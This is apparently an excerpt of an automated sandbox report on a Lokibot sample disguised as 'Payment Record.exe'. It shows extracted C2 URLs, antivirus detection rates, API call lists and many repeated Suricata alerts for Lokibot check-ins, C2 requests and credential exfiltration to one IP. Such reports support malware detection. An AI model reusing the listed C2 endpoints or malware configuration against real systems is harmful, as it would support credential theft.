2025-03-06T04:05:47.164818+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59251	104.21.16.1	80	TCP
2025-03-06T04:05:48.954382+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59256	104.21.16.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://alphastand.win/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://alphastand.trade/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.top/alien/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Payment Record.exe	ReversingLabs: Detection: 36%
Source: Payment Record.exe	Virustotal: Detection: 29%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Payment Record.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: Payment Record.exe, 00000000.00000003.2127326000.0000000003980000.00000004.00001000.00020000.00000000.sdmp, Payment Record.exe, 00000000.00000003.2126483693.0000000003B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Record.exe, 00000000.00000003.2127326000.0000000003980000.00000004.00001000.00020000.00000000.sdmp, Payment Record.exe, 00000000.00000003.2126483693.0000000003B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3366251258.0000000000A71000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3366251258.0000000000A71000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0070445A
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070C6D1 FindFirstFileW,FindClose,	0_2_0070C6D1
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0070C75C
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0070EF95
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0070F0F2
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0070F3F3
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_007037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007037EF
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00703B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00703B12
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0070BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0070BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49711 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49711 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49711 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49720 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49742 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49720 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49720 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49742 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49742 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49726 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49726 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49709 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49714 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49726 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49742 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49714 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49714 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49720 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49726 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49709 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49709 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49749 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49711 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49737 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49737 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49737 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49709 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49790 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49790 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49793 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49774 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49710 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49793 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49790 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49793 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49768 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49774 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49774 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49768 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49768 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49737 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49790 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49755 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49742
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49714 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49774 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49768 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49780 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49780 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49780 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49780 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59060 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59060 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59060 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59060 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59077 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59077 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59077 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49793 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49732 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49726
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49755 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49732 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49755 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49732 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59051 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59051 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49749 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49749 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49732 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49749 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59060
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49755 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59086 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59086 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59086 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49761 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49761 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49761 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49720
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59086 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49761 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59077 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59051 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59051 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49737
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49768
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59107 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59091 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59091 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59091 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49761
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59121 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59121 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59121 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49810 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49749
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49810 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49810 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59107 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59107 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59091 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59107 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49786 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59055 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49786 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49786 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59055 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59055 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49810 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59081 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59081 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59081 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59081 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59051
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49799 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49799 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49799 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59055 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59152 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59152 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59152 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59136 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49799 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59147 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59136 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59147 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59147 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59136 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49786 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59152 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59147 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59107
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59136 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59131 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49766 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59131 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49766 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59071 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49766 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59071 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59071 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59161 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49766 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59161 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59071 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59121 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59161 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59161 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59131 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59077
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59181 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49713 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59181 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59181 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49713 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59186 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49713 -> 104.21.16.1:80
